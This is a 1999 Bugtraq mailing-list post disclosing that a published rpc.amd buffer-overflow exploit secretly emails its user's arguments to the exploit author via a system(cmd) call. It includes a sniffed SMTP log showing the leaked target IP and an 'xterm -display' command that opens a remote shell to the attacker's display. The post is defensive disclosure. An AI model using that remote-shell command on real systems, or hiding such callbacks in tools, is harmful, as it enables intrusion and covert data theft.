Bugtraq mailing list archives
Re: Amd exploit
From: omri () INAME COM (Locke Montana)
Date: Sat, 4 Sep 1999 05:21:42 -0000
Hello, Sorry if this was already known, recently Someone named Taeho Oh published an exploit for a buffer overflow in rpc.amd (automount) While testing this exploit on my on server, i saw that i was opening a connection to ohhara.postech.ac.kr on port 25, After a little research i found out that The exploit (In it's original form) was sending an email to abuser () ohhara postech ac kr and listing the arguments i just entered, There is an easy way to stop it from sending Just comment the line: system(cmd); Here's the log as i got it from sniffit: EHLO BlackMesa.com MAIL From:<locke () BlackMesa com> SIZE=95 RCPT To:<abuser () ohhara postech ac kr> DATA Received: (from root@localhost) by BlackMesa.com (8.9.3/8.9.3) id FAA01208 for abuser () ohhara postech ac kr; Sat, 4 Sep 1999 05:30:56 +0200 Date: Sat, 4 Sep 1999 05:30:56 +0200 From: locke <locke () BlackMesa com> Message-Id: <199909040330.FAA01208 () BlackMesa com> To: abuser () ohhara postech ac kr 10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0 . QUIT QUIT (Ip's changed to protect the innocent) Bye
Current thread:
- Re: Amd exploit Locke Montana (Sep 03)